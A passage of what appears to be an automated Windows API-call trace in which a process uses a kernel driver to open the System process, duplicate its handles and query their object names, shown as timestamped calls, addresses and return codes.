ProcessHandle=0xffffe0006a3f1300*=0x19c) returned 0x0 [0256.690] IoCompleteRequest () returned 0x0 [0256.690] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0256.690] ZwOpenProcess (in: ProcessHandle=0xffffd000b1b8e420, DesiredAccess=0x40, ObjectAttributes=0xffffd000b1b8e438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000b1b8e420*=0xffffffff8000111c) returned 0x0 [0256.690] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff8000111c, SourceHandle=0x59c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.690] ZwClose (Handle=0xffffffff8000111c) returned 0x0 [0256.690] IoCompleteRequest () returned 0x0 [0256.690] CloseHandle (hObject=0x19c) returned 1 [0256.690] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.691] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x98, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.691] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x28, lpOverlapped=0x0) returned 1 [0256.691] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.691] PsAcquireProcessExitSynchronization () returned 0x0 [0256.691] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.691] ObReferenceObjectByHandle (in: Handle=0xffffffff8000059c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069715890, HandleInformation=0x0) returned 0x0 [0256.691] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.691] PsReleaseProcessExitSynchronization () returned 0x2 [0256.691] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2faa7 [0256.691] ObQueryNameString (in: Object=0xffffe00069715890, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.691] ObfDereferenceObject (Object=0xffffe00069715890) returned 0x10000 [0256.691] IoCompleteRequest () returned 0x0 [0256.691] CloseHandle (hObject=0x1a4) returned 1 [0256.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.691] GetLastError () returned 0x5 [0256.691] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.691] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.691] IoCompleteRequest () returned 0x0 [0256.691] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0256.691] ZwOpenProcess (in: ProcessHandle=0xffffd000b1b8e420, DesiredAccess=0x40, ObjectAttributes=0xffffd000b1b8e438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000b1b8e420*=0xffffffff8000111c) returned 0x0 [0256.691] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff8000111c, SourceHandle=0xa0, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe0006a3f1300*=0x19c) returned 0x0 [0256.691] ZwClose (Handle=0xffffffff8000111c) returned 0x0 [0256.691] IoCompleteRequest () returned 0x0 [0256.691] CloseHandle (hObject=0x1a4) returned 1 [0256.691] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.691] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.691] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0256.691] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.691] PsAcquireProcessExitSynchronization () returned 0x0 [0256.691] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.691] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000692a47b0, HandleInformation=0x0) returned 0x0 [0256.691] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.691] PsReleaseProcessExitSynchronization () returned 0x2 [0256.691] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2faa3 [0256.692] ObQueryNameString (in: Object=0xffffe000692a47b0, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.692] ObfDereferenceObject (Object=0xffffe000692a47b0) returned 0xffff [0256.692] IoCompleteRequest () returned 0x0 [0256.692] CloseHandle (hObject=0x19c) returned 1 [0256.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.692] GetLastError () returned 0x5 [0256.692] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0256.692] ZwOpenProcess (in: ProcessHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000b1b8e4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe0006a3f1300*=0x19c) returned 0x0 [0256.692] IoCompleteRequest () returned 0x0 [0256.692] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0256.692] ZwOpenProcess (in: ProcessHandle=0xffffd000b1b8e420, DesiredAccess=0x40, ObjectAttributes=0xffffd000b1b8e438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000b1b8e428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000b1b8e420*=0xffffffff8000111c) returned 0x0 [0256.692] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff8000111c, SourceHandle=0x14, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe0006a3f1300, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe0006a3f1300*=0x1a4) returned 0x0 [0256.692] ZwClose (Handle=0xffffffff8000111c) returned 0x0 [0256.692] IoCompleteRequest () returned 0x0 [0256.692] CloseHandle (hObject=0x19c) returned 1 [0256.692] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0256.692] NtQueryObject (in: Handle=0x1a4, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0256.692] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x48, lpOverlapped=0x0) returned 1 [0256.692] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.692] PsAcquireProcessExitSynchronization () returned 0x0 [0256.692] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.692] ObReferenceObjectByHandle (in: Handle=0xffffffff80000014, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e9dc90, HandleInformation=0x0) returned 0x0 [0256.692] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.692] PsReleaseProcessExitSynchronization () returned 0x2 [0256.692] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa9f [0256.692] ObQueryNameString (in: Object=0xffffe00067e9dc90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.692] ObfDereferenceObject (Object=0xffffe00067e9dc90) returned 0x10000 [0256.692] IoCompleteRequest () returned 0x0 [0256.692] CloseHandle (hObject=0x1a4) returned 1 [0256.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0256.692] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0256.692] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.693] PsAcquireProcessExitSynchronization () returned 0x0 [0256.693] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.693] ObReferenceObjectByHandle (in: Handle=0xffffffff8000007c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006f47b270, HandleInformation=0x0) returned 0x0 [0256.693] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.693] PsReleaseProcessExitSynchronization () returned 0x2 [0256.693] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa9d [0256.693] ObQueryNameString (in: Object=0xffffe0006f47b270, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.693] ObfDereferenceObject (Object=0xffffe0006f47b270) returned 0x7fff [0256.693] IoCompleteRequest () returned 0x0 [0256.693] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0256.693] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.693] PsAcquireProcessExitSynchronization () returned 0x0 [0256.693] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.693] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000695446f0, HandleInformation=0x0) returned 0x0 [0256.693] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.693] PsReleaseProcessExitSynchronization () returned 0x2 [0256.693] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa9c [0256.693] ObQueryNameString (in: Object=0xffffe000695446f0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.693] ObfDereferenceObject (Object=0xffffe000695446f0) returned 0x7ffa [0256.693] IoCompleteRequest () returned 0x0 [0256.693] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.693] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.693] PsAcquireProcessExitSynchronization () returned 0x0 [0256.693] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.693] ObReferenceObjectByHandle (in: Handle=0xffffffff800000bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007efa6de0, HandleInformation=0x0) returned 0x0 [0256.693] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.693] PsReleaseProcessExitSynchronization () returned 0x2 [0256.693] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa9b [0256.693] ObQueryNameString (in: Object=0xffffe0007efa6de0, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.693] ObfDereferenceObject (Object=0xffffe0007efa6de0) returned 0x8000 [0256.693] IoCompleteRequest () returned 0x0 [0256.693] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.693] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.693] PsAcquireProcessExitSynchronization () returned 0x0 [0256.694] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.694] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007f3ff490, HandleInformation=0x0) returned 0x0 [0256.694] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.694] PsReleaseProcessExitSynchronization () returned 0x2 [0256.694] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa9a [0256.694] ObQueryNameString (in: Object=0xffffe0007f3ff490, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.694] ObfDereferenceObject (Object=0xffffe0007f3ff490) returned 0x8000 [0256.694] IoCompleteRequest () returned 0x0 [0256.694] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.694] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.694] PsAcquireProcessExitSynchronization () returned 0x0 [0256.694] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.694] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007f3ff820, HandleInformation=0x0) returned 0x0 [0256.694] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.694] PsReleaseProcessExitSynchronization () returned 0x2 [0256.694] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa99 [0256.694] ObQueryNameString (in: Object=0xffffe0007f3ff820, ObjectNameInfo=0xffffe000685c67c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685c67c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.694] ObfDereferenceObject (Object=0xffffe0007f3ff820) returned 0x7fff [0256.694] IoCompleteRequest () returned 0x0 [0256.694] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x6a, lpOverlapped=0x0) returned 1 [0256.694] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.694] PsAcquireProcessExitSynchronization () returned 0x0 [0256.694] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.694] ObReferenceObjectByHandle (in: Handle=0xffffffff800000c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007f7fc920, HandleInformation=0x0) returned 0x0 [0256.694] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.694] PsReleaseProcessExitSynchronization () returned 0x2 [0256.694] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa98 [0256.694] ObQueryNameString (in: Object=0xffffe0007f7fc920, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.694] ObfDereferenceObject (Object=0xffffe0007f7fc920) returned 0x8000 [0256.694] IoCompleteRequest () returned 0x0 [0256.694] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.694] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.694] PsAcquireProcessExitSynchronization () returned 0x0 [0256.694] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.694] ObReferenceObjectByHandle (in: Handle=0xffffffff800000cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000805ff650, HandleInformation=0x0) returned 0x0 [0256.694] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.694] PsReleaseProcessExitSynchronization () returned 0x2 [0256.694] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa97 [0256.694] ObQueryNameString (in: Object=0xffffe000805ff650, ObjectNameInfo=0xffffe0006a43b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a43b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.694] ObfDereferenceObject (Object=0xffffe000805ff650) returned 0x8000 [0256.695] IoCompleteRequest () returned 0x0 [0256.695] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.695] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.695] PsAcquireProcessExitSynchronization () returned 0x0 [0256.695] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.695] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00080dbc360, HandleInformation=0x0) returned 0x0 [0256.695] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.695] PsReleaseProcessExitSynchronization () returned 0x2 [0256.695] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa96 [0256.695] ObQueryNameString (in: Object=0xffffe00080dbc360, ObjectNameInfo=0xffffe0006a604704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a604704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.695] ObfDereferenceObject (Object=0xffffe00080dbc360) returned 0x8000 [0256.695] IoCompleteRequest () returned 0x0 [0256.695] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xba, lpOverlapped=0x0) returned 1 [0256.695] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.695] PsAcquireProcessExitSynchronization () returned 0x0 [0256.695] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.695] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00080dbc070, HandleInformation=0x0) returned 0x0 [0256.695] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.695] PsReleaseProcessExitSynchronization () returned 0x2 [0256.695] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa95 [0256.695] ObQueryNameString (in: Object=0xffffe00080dbc070, ObjectNameInfo=0xffffe000690237c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690237c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.695] ObfDereferenceObject (Object=0xffffe00080dbc070) returned 0x8000 [0256.695] IoCompleteRequest () returned 0x0 [0256.695] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xba, lpOverlapped=0x0) returned 1 [0256.695] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.695] PsAcquireProcessExitSynchronization () returned 0x0 [0256.695] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.695] ObReferenceObjectByHandle (in: Handle=0xffffffff800000d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006d9ffca0, HandleInformation=0x0) returned 0x0 [0256.695] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.695] PsReleaseProcessExitSynchronization () returned 0x2 [0256.695] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa94 [0256.695] ObQueryNameString (in: Object=0xffffe0006d9ffca0, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.695] ObfDereferenceObject (Object=0xffffe0006d9ffca0) returned 0x8000 [0256.695] IoCompleteRequest () returned 0x0 [0256.695] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, 